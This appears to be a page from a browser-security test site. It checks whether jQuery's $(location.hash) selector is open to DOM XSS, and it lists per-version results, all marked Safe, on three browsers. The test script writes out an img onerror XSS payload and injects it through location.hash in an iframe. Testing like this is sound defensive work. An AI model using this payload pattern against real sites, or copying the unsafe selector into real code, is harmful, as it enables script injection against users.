Jquery ID selector + location.hash

$(location.hash)

By
Psych0tr1a 0 Seen 520 times
Tags
DOM XSS Jquery Selector
Run this test now.

Results


Tested on
Chrome - 69 - Windows 10
jQuery version:Status:
jQuery 2.0.3Safe
jQuery 2.0.2Safe
jQuery 2.0.0Safe
jQuery 1.10.2Safe
jQuery 1.10.1Safe
jQuery 1.10.0Safe
jQuery 1.9.1Safe
jQuery 1.9.0Safe
jQuery 1.8.3Safe
jQuery 2.0.1Safe
jQuery 1.8.1Safe
jQuery 1.3.2Safe
jQuery 1.3.1Safe
jQuery 1.3.0Safe
jQuery 1.6.0Safe
jQuery 1.4.4Safe
jQuery 1.5.2Safe
jQuery 1.5.1Safe
jQuery 1.5.0Safe
jQuery 1.4.3Safe
jQuery 1.8.0Safe
jQuery 1.7.2Safe
jQuery 1.7.1Safe
jQuery 1.7.0Safe
jQuery 1.4.2Safe
jQuery 1.2.6Safe
jQuery 1.2.3Safe
jQuery 1.4.1Safe
jQuery 1.6.3Safe
jQuery 1.6.1Safe
jQuery 1.4.0Safe
jQuery 1.6.4Safe
jQuery 1.6.2Safe
jQuery 1.8.2Safe

Tested on
Chrome Mobile - 41 - Android
jQuery version:Status:
jQuery 2.0.3Safe
jQuery 2.0.2Safe
jQuery 2.0.1Safe
jQuery 2.0.0Safe
jQuery 1.10.2Safe
jQuery 1.10.1Safe
jQuery 1.10.0Safe
jQuery 1.9.1Safe
jQuery 1.9.0Safe
jQuery 1.8.3Safe
jQuery 1.8.2Safe
jQuery 1.8.1Safe
jQuery 1.8.0Safe
jQuery 1.7.2Safe
jQuery 1.7.1Safe
jQuery 1.7.0Safe
jQuery 1.6.4Safe
jQuery 1.6.3Safe
jQuery 1.6.2Safe
jQuery 1.6.1Safe
jQuery 1.6.0Safe
jQuery 1.5.2Safe
jQuery 1.5.1Safe
jQuery 1.5.0Safe
jQuery 1.4.4Safe
jQuery 1.4.3Safe
jQuery 1.4.2Safe
jQuery 1.4.1Safe
jQuery 1.4.0Safe
jQuery 1.3.2Safe
jQuery 1.3.1Safe
jQuery 1.3.0Safe
jQuery 1.2.6Safe
jQuery 1.2.3Safe

Tested on
Googlebot - 2.1 - undefined
jQuery version:Status:
jQuery 2.0.3Safe
jQuery 2.0.2Safe
jQuery 2.0.1Safe
jQuery 2.0.0Safe
jQuery 1.10.2Safe
jQuery 1.10.1Safe
jQuery 1.10.0Safe
jQuery 1.9.1Safe
jQuery 1.9.0Safe
jQuery 1.8.3Safe
jQuery 1.8.2Safe
jQuery 1.8.1Safe
jQuery 1.8.0Safe
jQuery 1.7.2Safe
jQuery 1.7.1Safe
jQuery 1.7.0Safe
jQuery 1.6.4Safe
jQuery 1.6.3Safe
jQuery 1.6.2Safe
jQuery 1.6.1Safe
jQuery 1.6.0Safe
jQuery 1.5.2Safe
jQuery 1.5.1Safe
jQuery 1.5.0Safe
jQuery 1.4.4Safe
jQuery 1.4.3Safe
jQuery 1.4.2Safe
jQuery 1.4.1Safe
jQuery 1.4.0Safe
jQuery 1.3.2Safe
jQuery 1.3.1Safe
jQuery 1.3.0Safe
jQuery 1.2.6Safe
jQuery 1.2.3Safe

User Script (ENUM_FUNCTION)

					
var jQuery_version = '';

function vulnerable(){
	addError('jQuery '+ jQuery_version, '<b>Vulnerable</b>');
}

function safe(){
	addSuccess('jQuery '+ jQuery_version, 'Safe');
}
	
function removeIframe(){
	var x = document.getElementById('jQueryFrameID');
	x.parentNode.removeChild(x);
}


function test(data){
	try{
	    console.log(data)
	    
		jQuery_version = data;
		
		
		var jQueryFrame = document.createElement('iframe');
		jQueryFrame.id = 'jQueryFrameID';
		var exploitHTML = '<script src="//ajax.googleapis.com/ajax/libs/jquery/'+ jQuery_version.toString() +'/jquery.js"><\/script><script>var tst=0;location.hash="<img src=s onerror=tst=1>";$(function(){$(location.hash)});setTimeout("if(tst==1){parent.vulnerable()}else{parent.safe()};parent.removeIframe()",2000)<\/script>';
		document.body.appendChild(jQueryFrame);
		iframeDoc = jQueryFrame.contentDocument || jQueryFrame.contentWindow.document;
		iframeDoc.open();
		iframeDoc.write(exploitHTML);
		iframeDoc.close();
		
	}
	catch(err){
		addInfo(jQuery_version , 'Some Error Occured: ' + err);
	}
}

					
				

Enum Data (ENUM_FUNCTION)

					
var data = ['2.0.3', '2.0.2', '2.0.1', '2.0.0', '1.10.2', '1.10.1', '1.10.0', '1.9.1', '1.9.0', '1.8.3', '1.8.2', '1.8.1', '1.8.0', '1.7.2', '1.7.1', '1.7.0', '1.6.4', '1.6.3', '1.6.2', '1.6.1', '1.6.0', '1.5.2', '1.5.1', '1.5.0', '1.4.4', '1.4.3', '1.4.2', '1.4.1', '1.4.0', '1.3.2', '1.3.1', '1.3.0', '1.2.6', '1.2.3'];